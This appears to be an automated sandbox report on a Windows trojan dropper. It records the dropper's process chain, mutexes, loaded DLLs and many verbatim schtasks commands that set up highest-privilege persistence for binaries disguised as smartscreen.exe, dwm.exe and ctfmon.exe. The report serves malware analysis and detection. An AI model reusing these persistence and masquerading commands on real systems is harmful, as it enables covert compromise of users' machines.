                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 37_2_00007FFD9B7C988437_2_00007FFD9B7C9884
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 37_2_00007FFD9B790D4837_2_00007FFD9B790D48
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 37_2_00007FFD9B790E4337_2_00007FFD9B790E43
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 38_2_00007FFD9B760D4838_2_00007FFD9B760D48
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 38_2_00007FFD9B760E4338_2_00007FFD9B760E43
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 39_2_00007FFD9B780D4839_2_00007FFD9B780D48
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 39_2_00007FFD9B780E4339_2_00007FFD9B780E43
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 39_2_00007FFD9B7902AD39_2_00007FFD9B7902AD
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 39_2_00007FFD9B7B114139_2_00007FFD9B7B1141
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 39_2_00007FFD9B7BD23339_2_00007FFD9B7BD233
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 39_2_00007FFD9B7B117539_2_00007FFD9B7B1175
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 39_2_00007FFD9B7B988439_2_00007FFD9B7B9884
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 40_2_00007FFD9B790D4840_2_00007FFD9B790D48
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 40_2_00007FFD9B790E4340_2_00007FFD9B790E43
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 41_2_00007FFD9B780D4841_2_00007FFD9B780D48
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 41_2_00007FFD9B780E4341_2_00007FFD9B780E43
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 41_2_00007FFD9B7B114141_2_00007FFD9B7B1141
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 41_2_00007FFD9B7BD23341_2_00007FFD9B7BD233
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 41_2_00007FFD9B7B117541_2_00007FFD9B7B1175
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 41_2_00007FFD9B7B988441_2_00007FFD9B7B9884
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 41_2_00007FFD9B7902AD41_2_00007FFD9B7902AD
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 42_2_00007FFD9B770D4842_2_00007FFD9B770D48
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 42_2_00007FFD9B770E4342_2_00007FFD9B770E43
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 42_2_00007FFD9BB14F0442_2_00007FFD9BB14F04
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 43_2_00007FFD9B7702AD43_2_00007FFD9B7702AD
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 43_2_00007FFD9B760D4843_2_00007FFD9B760D48
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 43_2_00007FFD9B760E4343_2_00007FFD9B760E43
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 43_2_00007FFD9B79114143_2_00007FFD9B791141
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 43_2_00007FFD9B79D23343_2_00007FFD9B79D233
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 43_2_00007FFD9B79117543_2_00007FFD9B791175
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeCode function: 43_2_00007FFD9B79988443_2_00007FFD9B799884
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 44_2_00007FFD9B7802AD44_2_00007FFD9B7802AD
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 44_2_00007FFD9B770D4844_2_00007FFD9B770D48
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 44_2_00007FFD9B770E4344_2_00007FFD9B770E43
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 44_2_00007FFD9B7A114144_2_00007FFD9B7A1141
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 44_2_00007FFD9B7AD23344_2_00007FFD9B7AD233
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 44_2_00007FFD9B7A117544_2_00007FFD9B7A1175
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeCode function: 44_2_00007FFD9B7A988444_2_00007FFD9B7A9884
                                    Source: Joe Sandbox View | Dropped File: C:\Users\user\Desktop\etRRuFlx.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: String function: 0043EB78 appears 39 times
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: String function: 0043F5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: String function: 0043EC50 appears 56 times
                                    Source: EjS7Q5fFCE.exe, 00000000.00000003.1668240113.0000000006958000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EjS7Q5fFCE.exe
                                    Source: EjS7Q5fFCE.exe, 00000000.00000003.1668710147.00000000052B2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EjS7Q5fFCE.exe
                                    Source: EjS7Q5fFCE.exe | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs EjS7Q5fFCE.exe
                                    Source: EjS7Q5fFCE.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: Portsessionsvc.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: iEIWJugOSvvEyboGDFYpQ.exe.7.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: ctfmon.exe.7.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, gPIGJGRNbTd3Z8flbUb.cs | Cryptographic APIs: 'CreateDecryptor' (4 identical entries)
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, gPIGJGRNbTd3Z8flbUb.cs | Cryptographic APIs: 'CreateDecryptor' (4 identical entries)
                                    Source: classification engine | Classification label: mal100.spre.troj.expl.evad.winEXE@59/32@1/1
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_00426C74 GetLastError,FormatMessageW
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_0043A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | File created: C:\Users\user\Desktop\kwWqKlvO.log
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Mutant created: NULL
                                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6016:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
                                    Source: C:\Windows\Resources\Themes\smartscreen.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-5T1XqD41gjMZTLBOC4hB
                                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | File created: C:\Users\user\AppData\Local\Temp\jgewpxd5
                                    Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ComproviderComponentIntocommon\9j6CCih.bat" "
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Command line argument: sfxname (0_2_0043DF1E)
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Command line argument: sfxstime (0_2_0043DF1E)
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Command line argument: STARTDLG (0_2_0043DF1E)
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Command line argument: xzG (0_2_0043DF1E)
                                    Source: EjS7Q5fFCE.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: EjS7Q5fFCE.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (18 identical entries)
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | File read: C:\Windows\win.ini
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                    Source: EjS7Q5fFCE.exe | ReversingLabs: Detection: 62%
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | File read: C:\Users\user\Desktop\EjS7Q5fFCE.exe
                                    Source: unknown | Process created: C:\Users\user\Desktop\EjS7Q5fFCE.exe "C:\Users\user\Desktop\EjS7Q5fFCE.exe"
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ComproviderComponentIntocommon\9ILuIMngNdMuzngHHMAY9BVvKTDwm0yZ13RpFsRY.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ComproviderComponentIntocommon\9j6CCih.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\ComproviderComponentIntocommon\Portsessionsvc.exe "C:\ComproviderComponentIntocommon/Portsessionsvc.exe"
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 7 /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreen" /sc ONLOGON /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /rl HIGHEST /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 10 /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /rl HIGHEST /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF1F4.tmp" "c:\Windows\System32\CSC14843E573E24440A98F4B13FC0AF1E.TMP"
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Recovery\dwm.exe'" /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\dwm.exe'" /rl HIGHEST /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Recovery\dwm.exe'" /rl HIGHEST /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQi" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\iEIWJugOSvvEyboGDFYpQ.exe'" /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQ" /sc ONLOGON /tr "'C:\Users\All Users\iEIWJugOSvvEyboGDFYpQ.exe'" /rl HIGHEST /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQi" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\iEIWJugOSvvEyboGDFYpQ.exe'" /rl HIGHEST /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 13 /tr "'C:\ComproviderComponentIntocommon\ctfmon.exe'" /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ctfmon" /sc ONLOGON /tr "'C:\ComproviderComponentIntocommon\ctfmon.exe'" /rl HIGHEST /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 5 /tr "'C:\ComproviderComponentIntocommon\ctfmon.exe'" /rl HIGHEST /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQi" /sc MINUTE /mo 8 /tr "'C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe'" /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQ" /sc ONLOGON /tr "'C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe'" /rl HIGHEST /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQi" /sc MINUTE /mo 8 /tr "'C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe'" /rl HIGHEST /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "PortsessionsvcP" /sc MINUTE /mo 9 /tr "'C:\ComproviderComponentIntocommon\Portsessionsvc.exe'" /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Portsessionsvc" /sc ONLOGON /tr "'C:\ComproviderComponentIntocommon\Portsessionsvc.exe'" /rl HIGHEST /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "PortsessionsvcP" /sc MINUTE /mo 9 /tr "'C:\ComproviderComponentIntocommon\Portsessionsvc.exe'" /rl HIGHEST /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jdisWpWAyY.bat"
                                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: unknown | Process created: C:\ComproviderComponentIntocommon\ctfmon.exe C:\ComproviderComponentIntocommon\ctfmon.exe
                                    Source: unknown | Process created: C:\ComproviderComponentIntocommon\ctfmon.exe C:\ComproviderComponentIntocommon\ctfmon.exe
                                    Source: unknown | Process created: C:\Recovery\dwm.exe C:\Recovery\dwm.exe
                                    Source: unknown | Process created: C:\Recovery\dwm.exe C:\Recovery\dwm.exe
                                    Source: unknown | Process created: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe
                                    Source: unknown | Process created: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe
                                    Source: unknown | Process created: C:\ComproviderComponentIntocommon\Portsessionsvc.exe C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                    Source: unknown | Process created: C:\ComproviderComponentIntocommon\Portsessionsvc.exe C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                    Source: unknown | Process created: C:\Windows\Resources\Themes\smartscreen.exe C:\Windows\Resources\Themes\smartscreen.exe
                                    Source: unknown | Process created: C:\Windows\Resources\Themes\smartscreen.exe C:\Windows\Resources\Themes\smartscreen.exe
                                    Source: unknown | Process created: C:\Windows\Resources\Themes\smartscreen.exe "C:\Windows\Resources\Themes\smartscreen.exe"
                                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe "C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe"
                                    Source: C:\Windows\Resources\Themes\smartscreen.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ycxw1CWDXu.bat"
                                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Section loaded: version.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Section loaded: dxgidebug.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Section loaded: sfc_os.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Section loaded: sspicli.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Section loaded: rsaenh.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Section loaded: uxtheme.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Section loaded: dwmapi.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Section loaded: cryptbase.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Section loaded: riched20.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Section loaded: usp10.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Section loaded: msls31.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Section loaded: kernel.appcore.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Section loaded: windowscodecs.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Section loaded: textshaping.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Section loaded: textinputframework.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Section loaded: coreuicomponents.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Section loaded: coremessaging.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Section loaded: ntmarta.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Section loaded: wintypes.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Section loaded: wintypes.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: cryptbase.dllJump to behavior
